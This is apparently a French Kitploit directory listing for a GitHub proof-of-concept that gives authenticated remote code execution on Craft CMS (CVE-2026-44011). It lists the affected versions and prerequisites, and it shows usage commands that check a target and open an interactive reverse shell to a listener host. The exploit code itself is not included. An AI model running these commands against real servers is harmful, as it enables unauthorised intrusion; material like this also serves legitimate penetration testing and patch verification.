Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-44011-poc — PoC RCE authentifié pour Craft CMS (CVE-2026-44011) | Kitploit
Outils/GitHubGitHub/dennisdgr/cve-2026-44011-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubdennisdgr/cve-2026-44011-poc

CVE-2026-44011-poc

PoC RCE authentifié pour Craft CMS (CVE-2026-44011)

Voir le dépôt
4il y a 3 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-44011 : PoC de RCE authentifiée dans Craft CMS

Ce script Python adapte l'attaque décrite dans l'avis de sécurité Craft CMS. Un utilisateur Craft authentifié peut atteindre un chemin de configuration de mise en page de champs vulnérable et provoquer l'exécution de commandes par le serveur.

Périmètre et prérequis

Les versions affectées sont Craft CMS >=4.0.0, <4.17.12 et >=5.0.0, <5.9.18.

Le script nécessite curl sur les deux hôtes. Il utilise Bash sur le serveur. Python3 sur le serveur fournit également un PTY interactif ; sans lui, le shell se rabat sur une connexion basique.

Utilisation

# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check

# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'

Crédits

Craft CMS crédite @precicom-vincent-tl comme découvreur de CVE-2026-44011. Les détails de la vulnérabilité et l'exemple de payload sont publiés dans l'avis Craft CMS GHSA-qrgm-p9w5-rrfw. Ce script adapte cette technique publiée.

Télécharger l’outil